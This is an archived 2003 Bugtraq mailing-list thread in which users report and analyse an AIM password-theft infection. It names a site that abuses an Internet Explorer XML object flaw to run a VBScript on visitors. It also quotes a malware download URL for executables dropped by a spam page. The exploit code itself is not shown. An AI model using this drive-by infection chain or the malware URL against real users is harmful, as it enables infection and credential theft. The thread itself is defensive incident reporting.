Neohapsis / Archives / Daily posts / Message Index / Message #0004 RE: [Fwd: Re: AIM Password theft] From: S G Masood (sgmasoodyahoo.com) Date: Tue Sep 23 2003 - 17:50:23 CDT Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] -------------------------------------------------------------------------------- Hi Mark, www.Haxr.org uses the "XML Page Object Type Validation Vulnerability" [1] to infect IE users automatically. Here is the code from the site: ]]> This is almost an exact copy of the PoC exploit posted for this vuln. tracker.php points to the exec.vbs script that you posted. This finally gets executed on the victim machine and does its stuff. >If this is new, its going to spread like wildfire. It will infect many machines but IMO, it wouldn't exactly spread like "wildfire" 'coz it has a "single point of failure". Have you considered complaining to the hosting service of www.haxr.org? -- Regards, S.G.Masood Hyderabad, India -- Re: AIM Password theft From: Brent Meshier (brentmeshier.com) Date: Tue Sep 23 2003 - 14:13:04 CDT Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] -------------------------------------------------------------------------------- Mark, The code you just sent looks familiar to a SPAM I received attempting to hijack users' e-gold accounts. Out of curiosity I followed that link which loaded start.html (attached). What worries me is that I'm running IE 6.0.2800.1106 with all the latest patches from Microsoft and this page (start.html) rewrote wmplayer.exe on my local drive without notice. After closing the page, I found two .exe files on my desktop (which loaded from http://doz.linux162.onway.net/eg/1.exe). Is this a new unknown vulnerability? Brent Meshier Global Transport Logistics, Inc. http://www.gtlogistics.com/ "Innovative Fulfillment Solutions" -----Original Message----- From: Mark Coleman [mailto:markc@uniontown.com] Sent: Tuesday, September 23, 2003 11:43 AM To: bugtraq@securityfocus.org Subject: [Fwd: Re: AIM Password theft] Hi, can anyone shed some light on this for me? If this is new, its going to spread like wildfire. AOL or incidents lists have yet to reply.... it appears to be a legitimate threat as I have at least one user "infected" already.. Thank you.. -Mark Coleman